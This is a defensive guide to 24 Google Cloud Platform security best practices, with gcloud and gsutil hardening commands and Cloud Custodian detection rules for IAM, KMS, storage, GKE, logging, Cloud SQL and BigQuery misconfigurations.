24 Google Cloud Platform (GCP) security best practices
You’ve got a problem to solve, and you’ve turned to Google Cloud Platform to build and host your solution, following GCP security best practices along the way. You create your account and are all set to brew some coffee, sit down at your workstation, and architect, code, build, and deploy. Except… you aren’t.

  • IAM
    • (1) Check IAM policies
    • (2) MFA enabled for all users
    • (3) Security Key for admin
    • (4) Prevent the use of service accounts
  • KMS
    • (5) Not publicly accessible
    • (6) Rotate KMS encryption keys
  • Cloud Storage
    • (7) Not publicly accessible
    • (8) Uniform bucket-level access enabled
  • VPC
    • (9) Enable VPC Flow Logs
  • Compute Engine
    • (10) Enable Block Project-wide SSH keys
    • (11) Not Enable connecting to serial ports
    • (12) Encrypted with CSEK for critical VMs
  • GKE
    • (13) Enable secrets encryption
    • (14) Enable GKE cluster node encryption
    • (15) Restrict network access
  • Cloud Logging
    • (16) Ensure that Cloud Audit Logging is configured
    • (17) Ensure that sinks are configured
    • (18) Retention policies on log buckets are configured
    • (19) Enable logs router encryption
  • Cloud SQL
    • (20) Enable SSL to all incoming connections
    • (21) Not publicly accessible
    • (22) Do not have public IPs
    • (23) Automated backups configured
  • BigQuery
    • (24) Not publicly accessible

There are many knobs you must tweak and practices to put into action if you want your solution to be operative, secure, reliable, performant, and cost-effective. First things first, the best time to do that is now – right from the beginning, before you start to design and engineer.


Google Cloud Platform shared responsibility model

The scope of Google Cloud products and services ranges from conventional Infrastructure as a Service (IaaS) to Platform as a Service (PaaS) and Software as a Service (SaaS). As shown in the figure, the traditional boundaries of responsibility between users and cloud providers change based on the service they choose.

At the very least, as part of the shared responsibility for security, public cloud providers need to give you a solid and secure foundation. Providers also need to empower you to understand and implement your own parts of the shared responsibility model.

Shared responsibility model

Set up Google Cloud Platform with security best practices

First, a word of caution: Never use a non-corporate account.

Instead, use a fully managed corporate Google account to improve visibility, auditing, and control of access to Cloud Platform resources. Don’t use email accounts outside of your organization, such as personal accounts, for business purposes.

Cloud Identity is a stand-alone Identity-as-a-Service (IDaaS) that gives Google Cloud users access to many of the identity management features of Google Workspace, Google’s suite of secure, cloud-native collaboration and productivity applications. Through the Cloud Identity management layer, you can enable or disable access to various Google solutions for members of your organization, including Google Cloud Platform (GCP).

Signing up for Cloud Identity also creates an organizational node for your domain. This helps you map your corporate structure and controls to Google Cloud resources through the Google Cloud resource hierarchy.

Now, activating Multi-Factor Authentication (MFA) is the most important thing you can do. If you want a security-first mindset, enable it for every user account you create, and it is especially crucial for administrators. MFA, along with strong passwords, is the most effective way to secure user accounts against improper access.

Now that you are set, let’s dig into the GCP security best practices.

GCP Security Walkthrough

In this section, we will walk through the most common GCP services and provide two dozen (we like dozens here) best practices to adopt for each.

To help achieve these Google Cloud Platform security best practices, we will use the open source Cloud Custodian, a Cloud Security Posture Management (CSPM) tool. CSPM tools evaluate your cloud configuration and identify common configuration mistakes. They also monitor cloud logs to detect threats and configuration changes.

Now let’s walk through service by service.

Identity and Access Management (IAM)

GCP Identity and Access Management (IAM) helps enforce least privilege access control to your cloud resources. You can use IAM to restrict who is authenticated (signed in) and authorized (has permissions) to use resources.

A few GCP security best practices you want to implement for IAM:

1. Check your IAM policies for personal email accounts 🟨

For each Google Cloud Platform project, list the accounts that have been granted access to that project:

gcloud projects get-iam-policy PROJECT_ID

Also list the accounts added on each folder:

gcloud resource-manager folders get-iam-policy FOLDER_ID

And list your organization’s IAM policy:

gcloud organizations get-iam-policy ORGANIZATION_ID

No email accounts outside the organization domain should be granted permissions in the IAM policies. This excludes Google-owned service accounts.

By default, no email addresses outside the organization’s domain have access to its Google Cloud deployments, but any user email account can be added to the IAM policy for Google Cloud Platform projects, folders, or organizations. To prevent this, enable Domain Restricted Sharing within the organization policy:

gcloud resource-manager org-policies allow iam.allowedPolicyMemberDomains DOMAIN_ID --organization=ORGANIZATION_ID

Here is a Cloud Custodian rule for detecting the use of personal accounts:

- name: personal-emails-used
  description: |
    Use corporate login credentials instead of personal accounts,
    such as Gmail accounts.
  resource: gcp.project
  filters:
    - type: iam-policy
      key: "bindings[*].members[]"
      op: contains-regex
      value: .+@(?!organization\.com|.+gserviceaccount\.com)(.+\.com)*

2. Ensure that MFA is enabled for all user accounts 🟥

Multi-factor authentication requires more than one mechanism to authenticate a user. This secures user logins from attackers exploiting stolen or weak credentials. By default, multi-factor authentication is not set.

Make sure that for each Google Cloud Platform project, folder, or organization, multi-factor authentication for each account is set and, if not, set it up.

3. Ensure Security Key enforcement for admin accounts 🟥

GCP users with Organization Administrator roles have the highest level of privilege in the organization.

These accounts should be protected with the strongest form of two-factor authentication: Security Key Enforcement. Ensure that admins use Security Keys to log in instead of weaker second factors, like SMS or one-time passwords (OTP). Security Keys are actual physical keys used to access Google Organization Administrator Accounts. They send an encrypted signature rather than a code, ensuring that logins cannot be phished.

Identify users with Organization Administrator privileges:

gcloud organizations get-iam-policy ORGANIZATION_ID

Look for members granted the role “roles/resourcemanager.organizationAdmin” and then manually verify that Security Key Enforcement has been enabled for each account. If not enabled, take it seriously and enable it immediately. By default, Security Key Enforcement is not enabled for Organization Administrators.

If an organization administrator loses access to their security key, the user may not be able to access their account. For this reason, it is important to configure backup security keys.

4. Prevent the use of user-managed service account keys 🟨

Anyone with access to the keys can access resources through the service account. GCP-managed keys are used by Cloud Platform services, such as App Engine and Compute Engine. These keys cannot be downloaded. Google holds the key and rotates it automatically almost every week.

On the other hand, user-managed keys are created, downloaded, and managed by the user and only expire 10 years after they are created.

User-managed keys can easily be compromised by common development practices, such as exposing them in source code, leaving them in the downloads directory, or accidentally showing them on support blogs or channels.

List all the service accounts:

gcloud iam service-accounts list

Identify user-managed service accounts; the emails of such accounts end with iam.gserviceaccount.com.

For each user-managed service account, list the keys managed by the user:

gcloud iam service-accounts keys list --iam-account=SERVICE_ACCOUNT --managed-by=user

No keys should be listed. If any key shows up in the list, you should delete it:

gcloud iam service-accounts keys delete --iam-account=SERVICE_ACCOUNT KEY_ID

Please be aware that deleting user-managed service account keys may break communication with the applications using the corresponding keys.

As a prevention, you will want to disable service account key creation too.
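
One way to do this is with the iam.disableServiceAccountKeyCreation organization policy constraint. The following is a minimal sketch, assuming you have permission to manage organization policies; ORGANIZATION_ID is a placeholder:

gcloud resource-manager org-policies enable-enforce iam.disableServiceAccountKeyCreation --organization=ORGANIZATION_ID

With this constraint enforced, new user-managed service account keys cannot be created anywhere in the organization.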

Other GCP security IAM best practices include:

  • Service accounts should not have Admin privileges.
  • IAM users should not be assigned the Service Account User or Service Account Token Creator roles at project level.
  • User-managed / external keys for service accounts (if allowed, see #4) should be rotated every 90 days or less.
  • Separation of duties should be enforced while assigning service account related roles to users.
  • Separation of duties should be enforced while assigning KMS related roles to users.
  • API keys should not be created for a project.
  • API keys should be restricted to use by only specified Hosts and Apps.
  • API keys should be restricted to only APIs that the application needs access to.
  • API keys should be rotated every 90 days or less.

Key Management Service (KMS)

GCP Cloud Key Management Service (KMS) is a cloud-hosted key management service that allows you to manage symmetric and asymmetric encryption keys for your cloud services the same way you would on-premises. It lets you create, use, rotate, and destroy AES 256, RSA 2048, RSA 3072, RSA 4096, EC P256, and EC P384 encryption keys.

Some Google Cloud Platform security best practices you absolutely want to implement for KMS:

5. Check for anonymously or publicly accessible Cloud KMS keys 🟥

Granting permissions to allUsers or allAuthenticatedUsers lets anyone access the key. Such access may not be desirable if sensitive data is protected by it.

In this case, make sure that anonymous and/or public access to a Cloud KMS encryption key is not allowed. By default, Cloud KMS does not allow access to allUsers or allAuthenticatedUsers.

List all Cloud KMS keys:

gcloud kms keys list --keyring=KEY_RING_NAME --location=global --format=json | jq '.[].name'

Remove IAM policy binding for a KMS key to remove access to allUsers and allAuthenticatedUsers:

gcloud kms keys remove-iam-policy-binding KEY_NAME --keyring=KEY_RING_NAME --location=global --member=allUsers --role=ROLE
gcloud kms keys remove-iam-policy-binding KEY_NAME --keyring=KEY_RING_NAME --location=global --member=allAuthenticatedUsers --role=ROLE

The following is a Cloud Custodian rule for detecting the existence of anonymously or publicly accessible Cloud KMS keys:

- name: anonymously-or-publicly-accessible-cloud-kms-keys
  description: |
    It is recommended that the IAM policy on Cloud KMS cryptokeys should
    restrict anonymous and/or public access.
  resource: gcp.kms-cryptokey
  filters:
    - type: iam-policy
      key: "bindings[*].members[]"
      op: intersect
      value: ["allUsers", "allAuthenticatedUsers"]

6. Ensure that KMS encryption keys are rotated within a period of 90 days or less 🟩

Keys can be created with a specified rotation period. This is the time it takes for a new key version to be automatically generated. Since a key is used to protect some corpus of data, a collection of files can be encrypted using the same key, and users with decryption rights for that key can decrypt those files. Therefore, you need to make sure that the rotation period is set to a specific time.

A GCP security best practice is to establish this rotation period to 90 days or less:

gcloud kms keys update KEY_NAME --keyring=KEY_RING_NAME --location=LOCATION --rotation-period=90d

By default, KMS encryption keys are rotated every 90 days. If you never modified this, you are good to go.
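
To double-check a key, you can read back its rotation period. This is a sketch with placeholder names; the rotationPeriod field is returned in seconds (90 days appears as 7776000s):

gcloud kms keys describe KEY_NAME --keyring=KEY_RING_NAME --location=LOCATION --format="value(rotationPeriod)"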

Cloud Storage

Google Cloud Storage lets you store any amount of data in namespaces called “buckets.” These buckets are an appealing target for any attacker who wants to get hold of your data, so you must take great care in securing them.

These are a few of the GCP security best practices to implement:

7. Ensure that Cloud Storage buckets are not anonymously or publicly accessible 🟥

Allowing anonymous or public access gives everyone permission to access bucket content. Such access may not be desirable if you are storing sensitive data. Therefore, make sure that anonymous or public access to the bucket is not allowed.

List all buckets in a project:

gsutil ls

Check the IAM Policy for each bucket returned from the above command:

gsutil iam get gs://BUCKET_NAME

No role should contain allUsers or allAuthenticatedUsers as a member. If that’s not the case, you’ll want to remove them with:

gsutil iam ch -d allUsers gs://BUCKET_NAME
gsutil iam ch -d allAuthenticatedUsers gs://BUCKET_NAME

Also, you might want to prevent Storage buckets from becoming publicly accessible by setting up the Domain restricted sharing organization policy.
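
Another option is public access prevention, which can be enforced per bucket or organization-wide. A minimal sketch, with BUCKET_NAME and ORGANIZATION_ID as placeholders:

gsutil pap set enforced gs://BUCKET_NAME
gcloud resource-manager org-policies enable-enforce storage.publicAccessPrevention --organization=ORGANIZATION_ID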

8. Ensure that Cloud Storage buckets have uniform bucket-level access enabled 🟨

Cloud Storage provides two systems for granting users permission to access buckets and objects: Cloud Identity and Access Management (Cloud IAM) and Access Control Lists (ACLs). These systems work in parallel: only one of them needs to grant permission for a user to access a cloud storage resource.

Cloud IAM is used throughout Google Cloud and can grant different permissions at the bucket and project levels. ACLs are used only by Cloud Storage and have limited permission options, but you can grant permissions on a per-object basis (fine-grained).

Enabling the uniform bucket-level access feature disables ACLs on all Cloud Storage resources (buckets and objects) and allows access exclusively through Cloud IAM.

This feature is also used to consolidate and simplify the method of granting access to cloud storage resources. Enabling uniform bucket-level access guarantees that if a Storage bucket is not publicly accessible, no object in the bucket is publicly accessible either.

List all buckets in a project:

gsutil ls

Verify that uniform bucket-level access is enabled for each bucket returned from the above command:

gsutil uniformbucketlevelaccess get gs://BUCKET_NAME/

If uniform bucket-level access is enabled, the response looks like the following:

Uniform bucket-level access setting for gs://BUCKET_NAME/:
    Enabled: True
    LockedTime: LOCK_DATE

Should it not be enabled for a bucket, you can enable it with:

gsutil uniformbucketlevelaccess set on gs://BUCKET_NAME/

You can also set up an Organization Policy to enforce that any new bucket has uniform bucket-level access enabled.
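
As a sketch, the constraint in question is storage.uniformBucketLevelAccess, enforced here at the organization level (ORGANIZATION_ID is a placeholder):

gcloud resource-manager org-policies enable-enforce storage.uniformBucketLevelAccess --organization=ORGANIZATION_ID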

This is a Cloud Custodian rule to check for buckets without uniform-access enabled:

- name: check-uniform-access-in-buckets
  description: |
    It is recommended that uniform bucket-level access is enabled on
    Cloud Storage buckets.
  resource: gcp.bucket
  filters:
    - not:
      - type: value
        key: "iamConfiguration.uniformBucketLevelAccess.enabled"
        value: true

Virtual Private Cloud (VPC)

Virtual Private Cloud provides networking for your cloud-based resources and services that is global, scalable, and flexible. It provides networking functionality for App Engine, Compute Engine, and Google Kubernetes Engine (GKE), so you must take great care in securing it.

This is one of the best GCP security practices to implement:

9. Enable VPC Flow Logs for VPC Subnets 🟨

By default, the VPC Flow Logs feature is disabled when a new VPC network subnet is created. When enabled, VPC Flow Logs begin collecting network traffic data to and from your Virtual Private Cloud (VPC) subnets for network usage, network traffic cost optimization, network forensics, and real-time security analysis.

To increase the visibility and security of your Google Cloud VPC network, it’s strongly recommended that you enable Flow Logs for each business-critical or production VPC subnet.

gcloud compute networks subnets update SUBNET_NAME --region=REGION --enable-flow-logs
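
To verify the change, you can read back the subnet’s flow log setting. A minimal sketch with placeholder names; it should print True once flow logs are enabled:

gcloud compute networks subnets describe SUBNET_NAME --region=REGION --format="value(enableFlowLogs)"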

Compute Engine

Compute Engine provides a secure and customizable compute service that lets you create and run virtual machines on Google’s infrastructure.

Several GCP security best practices to implement as soon as possible:

10. Ensure “Block Project-wide SSH keys” is enabled for VM instances 🟨

You can use your project-wide SSH key to log in to all Google Cloud VM instances running within your GCP project. Using SSH keys for the entire project makes it easier to manage SSH keys, but if leaked, they become a security risk that can affect all VM instances in the project. So, it is highly recommended to use specific SSH keys instead, reducing the attack surface if they ever get compromised.

By default, the Block Project-Wide SSH Keys security feature is not enabled for your Google Compute Engine instances.

To Block Project-Wide SSH keys, set the metadata value to TRUE:

gcloud compute instances add-metadata INSTANCE_NAME --metadata block-project-ssh-keys=true

The following is a Cloud Custodian sample rule to check for instances without this block:

- name: instances-without-project-wide-ssh-keys-block
  description: |
    It is recommended to use Instance specific SSH key(s) instead
    of using common/shared project-wide SSH key(s) to access Instances.
  resource: gcp.instance
  filters:
    - not:
      - type: value
        key: name
        op: regex
        value: '(gke).+'
    - type: metadata
      key: '"block-project-ssh-keys"'
      value: "false"

11. Ensure ‘Enable connecting to serial ports’ is not enabled for VM Instance 🟨

A Google Cloud virtual machine (VM) instance has four virtual serial ports. Interacting with a serial port is similar to using a terminal window in that the inputs and outputs are completely in text mode, and there is no graphical interface or mouse support. The instance’s operating system, BIOS, and other system-level entities can often write output to the serial port and accept input such as commands and responses to prompts.

These system-level entities typically use the first serial port (Port 1), which is often referred to as the interactive serial console.

The interactive serial console does not support IP-based access restrictions, such as IP whitelists. When you enable the interactive serial console on an instance, clients can try to connect to it from any IP address. This allows anyone who knows the correct SSH key, username, project ID, zone, and instance name to connect to that instance. Therefore, to adhere to Google Cloud Platform security best practices, you should disable support for the interactive serial console.

gcloud compute instances add-metadata INSTANCE_NAME --zone=ZONE --metadata serial-port-enable=false

Also, you can prevent VMs from having interactive serial port access enabled by means of Disable VM serial port access organization policy.
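
If you manage this through an organization policy, the relevant boolean constraint is compute.disableSerialPortAccess. A sketch, with ORGANIZATION_ID as a placeholder:

gcloud resource-manager org-policies enable-enforce compute.disableSerialPortAccess --organization=ORGANIZATION_ID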

12. Ensure VM disks for critical VMs are encrypted with Customer-Supplied Encryption Keys (CSEK) 🟥

By default, the Compute Engine service encrypts all data at rest.

Cloud services manage this type of encryption without any additional action from users or applications. However, if you want full control over instance disk encryption, you can provide your own encryption key.

These custom keys, also known as Customer-Supplied Encryption Keys (CSEKs), are used by Google Compute Engine to protect the Google-generated keys used to encrypt and decrypt instance data. The Compute Engine service does not store CSEK on the server and cannot access protected data unless you specify the required key.

At the very least, business critical VMs should have VM disks encrypted with CSEK.

By default, VM disks are encrypted with Google-managed keys. They are not encrypted with Customer-Supplied Encryption Keys.

Currently, there is no way to update the encryption of an existing disk, so you should create a new disk with Encryption set to Customer supplied. A word of caution is necessary here:

⚠️ If you lose your encryption key, you will not be able to recover the data.

In the gcloud compute tool, encrypt a disk using the --csek-key-file flag during instance creation. If you are using an RSA-wrapped key, use the gcloud beta component:

gcloud beta compute instances create INSTANCE_NAME --csek-key-file=key-file.json

To encrypt a standalone persistent disk use:

gcloud beta compute disks create DISK_NAME --csek-key-file=key-file.json

It is your duty to generate and manage your key. You must provide a key that is a 256-bit string encoded in RFC 4648 standard base64 to the Compute Engine. A sample key-file.json looks like this:

[
  {
    "uri": "https://www.googleapis.com/compute/v1/projects/myproject/zones/us-central1-a/disks/example-disk",
    "key": "acXTX3rxrKAFTF0tYVLvydU1riRZTvUNC4g5I11NY-c=",
    "key-type": "raw"
  },
  {
    "uri": "https://www.googleapis.com/compute/v1/projects/myproject/global/snapshots/my-private-snapshot",
    "key": "ieCx/NcW06PcT7Ep1X6LUTc/hLvUDYyzSZPPVCVPTVEohpeHASqC8uw5TzyO9U+Fka9JFHz0mBibXUInrC/jEk014kCK/NPjYgEMOyssZ4ZINPKxlUh2zn1bV+MCaTICrdmuSBTWlUUiFoDD6PYznLwh8ZNdaheCeZ8ewEXgFQ8V+sDroLaN3Xs3MDTXQEMMoNUXMCZEIpg9Vtp9x2oeQ5lAbtt7bYAAHf5l+gJWw3sUfs0/Glw5fpdjT8Uggrr+RMZezGrltJEF293rvTIjWOEB3z5OHyHwQkvdrPDFcTqsLfh+8Hr8g+mf+7zVPEC8nEbqpdl3GPv3A7AwpFp7MA==",
    "key-type": "rsa-encrypted"
  }
]

Other GCP security best practices for Compute Engine include:

  • Ensure that instances are not configured to use the default service account.
  • Ensure that instances are not configured to use the default service account with full access to all Cloud APIs.
  • Ensure oslogin is enabled for a Project.
  • Ensure that IP forwarding is not enabled on Instances.
  • Ensure Compute instances are launched with Shielded VM enabled.
  • Ensure that Compute instances do not have public IP addresses (both shown in the sketch after this list).
  • Ensure that App Engine applications enforce HTTPS connections.
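
To illustrate two of the items above, here is a sketch of launching an instance with Shielded VM enabled and no external IP address. All names are placeholders, and the chosen image must support Shielded VM (current Google-provided images, such as the Debian family, do):

gcloud compute instances create INSTANCE_NAME --zone=ZONE --image-family=debian-11 --image-project=debian-cloud --shielded-secure-boot --shielded-vtpm --shielded-integrity-monitoring --no-address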

Google Kubernetes Engine Service (GKE)

The Google Kubernetes Engine (GKE) provides a managed environment for deploying, managing, and scaling containerized applications using the Google infrastructure. A GKE environment consists of multiple machines (specifically, Compute Engine instances) grouped together to form a cluster. Let’s continue with the GCP security best practices for GKE.

13. Enable application-layer secrets encryption for GKE clusters 🟥

Application-layer secret encryption provides an additional layer of security for sensitive data, such as Kubernetes secrets stored on etcd. This feature allows you to use Cloud KMS managed encryption keys to encrypt data at the application layer and protect it from attackers accessing offline copies of etcd. Enabling application-layer secret encryption in a GKE cluster is considered a security best practice for applications that store sensitive data.

Create a key ring to store the CMK:

gcloud kms keyrings create KEY_RING_NAME --location=REGION --project=PROJECT_NAME --format="table(name)"

Now, create a new Cloud KMS Customer-Managed Key (CMK) within the KMS key ring created at the previous step:

gcloud kms keys create KEY_NAME --location=REGION --keyring=KEY_RING_NAME --purpose=encryption --protection-level=software --rotation-period=90d --format="table(name)"

And lastly, assign the Cloud KMS “CryptoKey Encrypter/Decrypter” role to the appropriate service account:

gcloud projects add-iam-policy-binding PROJECT_ID --member=serviceAccount:service-PROJECT_NUMBER@container-engine-robot.iam.gserviceaccount.com --role=roles/cloudkms.cryptoKeyEncrypterDecrypter

The final step is to enable application-layer secrets encryption for the selected cluster, using the Cloud KMS Customer-Managed Key (CMK) created in the previous steps:

gcloud container clusters update CLUSTER --region=REGION --project=PROJECT_NAME --database-encryption-key=projects/PROJECT_NAME/locations/REGION/keyRings/KEY_RING_NAME/cryptoKeys/KEY_NAME

14. Enable GKE cluster node encryption with customer-managed keys 🟥

To give you more control over the GKE data encryption / decryption process, make sure your Google Kubernetes Engine (GKE) cluster node is encrypted with a customer-managed key (CMK). You can use the Cloud Key Management Service (Cloud KMS) to create and manage your own customer-managed keys (CMKs). Cloud KMS provides secure and efficient cryptographic key management, controlled key rotation, and revocation mechanisms.

At this point, you should already have a key ring where you store the CMKs, as well as customer-managed keys. You will use them here too.

To enable GKE cluster node encryption, you will need to re-create the node pool. For this, use the name of the cluster node pool that you want to re-create as an identifier parameter and custom output filtering to describe the configuration information available for the selected node pool:

gcloud container node-pools describe NODE_POOL --cluster=CLUSTER_NAME --region=REGION --format=json

Now, using the information returned in the previous step, create a new Google Cloud GKE cluster node pool, encrypted with your customer-managed key (CMK):

gcloud beta container node-pools create NODE_POOL --cluster=CLUSTER_NAME --region=REGION --disk-type=pd-standard --disk-size=150 --boot-disk-kms-key=projects/PROJECT/locations/REGION/keyRings/KEY_RING_NAME/cryptoKeys/KEY_NAME

Once your new cluster node pool is working properly, you can delete the original node pool so that you stop being billed for it.

⚠️ Take good care to delete the old pool and not the new one!

gcloud container node-pools delete NODE_POOL --cluster=CLUSTER_NAME --region=REGION

15. Restrict network access to GKE clusters 🟥

To limit your exposure to the Internet, make sure your Google Kubernetes Engine (GKE) cluster is configured with a master authorized network. Master authorized networks allow you to whitelist specific IP addresses and/or IP address ranges to access cluster master endpoints using HTTPS.

Adding a master authorized network can provide network-level protection and additional security benefits to your GKE cluster. Authorized networks allow access to a particular set of trusted IP addresses, such as those originating from a secure network. This helps protect access to the GKE cluster if the cluster’s authentication or authorization mechanism is vulnerable.

Add authorized networks to the selected GKE cluster to grant access to the cluster master from the trusted IP addresses / IP ranges that you define:

gcloud container clusters update CLUSTER_NAME --region=REGION --enable-master-authorized-networks --master-authorized-networks=CIDR_1,CIDR_2,...

In the previous command, you can specify multiple CIDRs (up to 50) separated by a comma.
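
You can then review the configured networks. A sketch with placeholder names:

gcloud container clusters describe CLUSTER_NAME --region=REGION --format="yaml(masterAuthorizedNetworksConfig)"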

The above are the most important best practices for GKE, since not adhering to them poses a high risk, but there are other security best practices you might want to adhere to:

  • Enable auto-repair for GKE cluster nodes (see the sketch after this list).
  • Enable auto-upgrade for GKE cluster nodes.
  • Enable integrity monitoring for GKE cluster nodes.
  • Enable secure boot for GKE cluster nodes.
  • Use shielded GKE cluster nodes.
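
As a sketch of the first two items, auto-repair and auto-upgrade can be enabled on an existing node pool (all names are placeholders):

gcloud container node-pools update NODE_POOL --cluster=CLUSTER_NAME --region=REGION --enable-autorepair --enable-autoupgrade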

Cloud Logging

Cloud Logging is a fully managed service that allows you to store, search, analyze, monitor, and alert on log data and events from Google Cloud and Amazon Web Services. You can collect log data from over 150 popular application components, on-premises systems, and hybrid cloud systems.

More GCP security best practices focus on Cloud Logging:

16. Ensure that Cloud Audit Logging is configured properly across all services and all users from a project 🟥

Cloud Audit Logging maintains two audit logs for each project, folder, and organization: Admin Activity and Data Access. Admin Activity logs contain log entries for API calls or other administrative actions that modify the configuration or metadata of resources. They are enabled for all services and cannot be configured. Data Access audit logs, on the other hand, record API calls that create, modify, or read user-provided data. They are disabled by default and should be enabled.

It is recommended to have an effective default audit config configured in such a way that you can log user activity tracking, as well as changes (tampering) to user data. Logs should be captured for all users.

For this, you will need to edit the project’s policy. First, download it as a yaml file:

gcloud projects get-iam-policy PROJECT_ID > /tmp/project_policy.yaml

Now, edit /tmp/project_policy.yaml adding or changing only the audit logs configuration to the following:

auditConfigs:
- auditLogConfigs:
  - logType: DATA_WRITE
  - logType: DATA_READ
  service: allServices

Please note that exemptedMembers is not set as audit logging should be enabled for all the users. Last, update the policy with the new changes:

gcloud projects set-iam-policy PROJECT_ID /tmp/project_policy.yaml

⚠️ Enabling the Data Access audit logs might result in your project being charged for the additional logs usage.

17. Ensure that sinks are configured for all log entries 🟨

You will also want to create a sink that exports a copy of all log entries. This way, you can aggregate logs from multiple projects and export them to a Security Information and Event Management (SIEM).

Exporting involves creating a filter to select the log entries to export and selecting the destination in Cloud Storage, BigQuery, or Cloud Pub/Sub. Filters and destinations are kept in an object called a sink. To ensure that all log entries are exported to the sink, make sure the filter is not configured.

To create a sink to export all log entries into a Google Cloud Storage bucket, run the following command:

gcloud logging sinks create SINK_NAME storage.googleapis.com/BUCKET_NAME

This will export events to a bucket, but you might want to use Cloud Pub/Sub or BigQuery instead.
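
For the Pub/Sub case, a minimal sketch looks like this (TOPIC_NAME, SINK_NAME, and PROJECT_ID are placeholders):

gcloud pubsub topics create TOPIC_NAME
gcloud logging sinks create SINK_NAME pubsub.googleapis.com/projects/PROJECT_ID/topics/TOPIC_NAME

The sink writes with its own service account; the writer identity printed by the create command must then be granted the Pub/Sub Publisher role on the topic.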

This is an example of a Cloud Custodian rule to check that the sinks are configured with no filter:

- name: check-no-filters-in-sinks
  description: |
    It is recommended to create a sink that will export copies of
    all the log entries. This can help aggregate logs from multiple
    projects and export them to a Security Information and Event
    Management (SIEM).
  resource: gcp.log-project-sink
  filters:
    - type: value
      key: filter
      value: empty

18. Ensure that retention policies on log buckets are configured using Bucket Lock 🟨

You can enable retention policies on log buckets to prevent logs stored in cloud storage buckets from being overwritten or accidentally deleted. It is recommended that you set up retention policies and configure bucket locks on all storage buckets that are used as log sinks, per the previous best practice.

To list all sinks destined to storage buckets:

gcloud logging sinks list --project=PROJECT_ID

For each storage bucket listed above, set a retention policy and lock it:

gsutil retention set TIME_DURATION gs://BUCKET_NAME
gsutil retention lock gs://BUCKET_NAME

⚠️ Bucket locking is an irreversible action. Once you lock a bucket, you cannot remove the retention policy from it or shorten the retention period.
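
Since locking is permanent, it is worth reviewing the policy first. A sketch:

gsutil retention get gs://BUCKET_NAME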

19. Enable logs router encryption with customer-managed keys 🟥

Make sure your Google Cloud Logs Router data is encrypted with a customer-managed key (CMK) to give you complete control over the data encryption and decryption process, as well as to meet your compliance requirements.

You will want to add a policy, binding to the IAM policy of the CMK, to assign the Cloud KMS “CryptoKey Encrypter/Decrypter” role to the necessary service account. Here, you’ll use the keyring and the CMK already created in #13.

gcloud kms keys add-iam-policy-binding KEY_ID --keyring=KEY_RING_NAME --location=global --member=serviceAccount:PROJECT_NUMBER@gcp-sa-logging.iam.gserviceaccount.com --role=roles/cloudkms.cryptoKeyEncrypterDecrypter

Cloud SQL

Cloud SQL is a fully managed relational database service for MySQL, PostgreSQL, and SQL Server. Run the same relational databases you know, with their rich extension collections, configuration flags, and developer ecosystems, but without the hassle of self-management.

These GCP security best practices focus on Cloud SQL:

20. Ensure that the Cloud SQL database instance requires all incoming connections to use SSL 🟨

A SQL database connection may reveal sensitive data, such as credentials, database queries, and query output, if intercepted (MITM). For security reasons, it’s recommended that you always use SSL encryption when connecting to your PostgreSQL, MySQL generation 1, and MySQL generation 2 instances.

To enforce SSL encryption for an instance, run the command:

gcloud sql instances patch INSTANCE_NAME --require-ssl

Additionally, MySQL generation 1 instances must be restarted for this configuration to take effect.

This Cloud Custodian rule can check for instances without SSL enforcement:

- name: cloud-sql-instances-without-ssl-required
  description: |
    It is recommended to enforce all incoming connections to
    SQL database instance to use SSL.
  resource: gcp.sql-instance
  filters:
    - not:
      - type: value
        key: "settings.ipConfiguration.requireSsl"
        value: true

21. Ensure that Cloud SQL database instances are not open to the world 🟥

Only trusted / known required IPs should be whitelisted to connect in order to minimize the attack surface of the database server instance. The allowed networks must not have an IP / network configured to 0.0.0.0/0 that allows access to the instance from anywhere in the world. Note that allowed networks apply only to instances with public IPs.

gcloud sql instances patch INSTANCE_NAME --authorized-networks=IP_ADDR1,IP_ADDR2...

To prevent new SQL instances from being configured to accept incoming connections from any IP addresses, set up a Restrict Authorized Networks on Cloud SQL instances Organization Policy.
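
As a sketch, the boolean constraint to enforce is sql.restrictAuthorizedNetworks (ORGANIZATION_ID is a placeholder):

gcloud resource-manager org-policies enable-enforce sql.restrictAuthorizedNetworks --organization=ORGANIZATION_ID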

22. Ensure that Cloud SQL database instances do not have public IPs 🟨

To lower the organization’s attack surface, Cloud SQL databases should not have public IPs. Private IPs provide improved network security and lower latency for your application.

For every instance, remove its public IP and assign a private IP instead:

gcloud beta sql instances patch INSTANCE_NAME --network=VPC_NETWORK_NAME --no-assign-ip

To prevent new SQL instances from getting configured with public IP addresses, set up a Restrict Public IP access on Cloud SQL instances Organization policy.

23. Ensure that Cloud SQL database instances are configured with automated backups 🟨

Backups provide a way to restore a Cloud SQL instance to retrieve lost data or recover from problems with that instance. Automatic backups should be set up for all instances that contain data needing to be protected from loss or damage. This recommendation applies to instances of SQL Server, PostgreSQL, MySQL generation 1, and MySQL generation 2.

List all Cloud SQL database instances using the following command:

gcloud sql instances list

Enable Automated backups for every Cloud SQL database instance:

gcloud sql instances patch INSTANCE_NAME --backup-start-time [HH:MM]

The backup-start-time parameter is specified in 24-hour time, in the UTC±00 time zone, and specifies the start of a 4-hour backup window. Backups can start any time during this backup window.

By default, automated backups are not configured for Cloud SQL instances. Data backup is not possible on any Cloud SQL instance unless Automated Backup is configured.
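
To confirm a given instance, you can read back its backup configuration. A sketch with a placeholder instance name:

gcloud sql instances describe INSTANCE_NAME --format="value(settings.backupConfiguration.enabled,settings.backupConfiguration.startTime)"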

There are other Cloud SQL best practices to take into account that are specific for MySQL, PostgreSQL, or SQL Server, but the aforementioned four are arguably the most important.

BigQuery

BigQuery is a serverless, highly-scalable, and cost-effective cloud data warehouse with an in-memory BI Engine and machine learning built in. As in the other sections, here is the GCP security best practice to implement for BigQuery.

24. Ensure that BigQuery datasets are not anonymously or publicly accessible 🟥

You don’t want to allow anonymous or public access in your BigQuery dataset’s IAM policies. Granting permissions to allUsers or allAuthenticatedUsers lets anyone access the dataset, which may not be desirable if sensitive data is stored there. Therefore, make sure that anonymous and/or public access to a dataset is not allowed.

To do this, you will need to edit the data set information. First you need to retrieve said information into your local filesystem:

bq show --format=prettyjson PROJECT_ID:DATASET_NAME > dataset_info.json

Now, in the access section of dataset_info.json, update the dataset information to remove all roles containing allUsers or allAuthenticatedUsers.
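
To spot the offending entries before editing, you can filter the saved file with jq. This is a sketch; the exact field names (specialGroup, iamMember) depend on how the access was granted:

jq '.access[] | select(.specialGroup == "allAuthenticatedUsers" or .iamMember == "allUsers")' dataset_info.json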

Finally, update the dataset:

bq update --source=dataset_info.json PROJECT_ID:DATASET_NAME

You can prevent BigQuery datasets from becoming publicly accessible by setting up the Domain restricted sharing organization policy.

Compliance Standards & Benchmarks

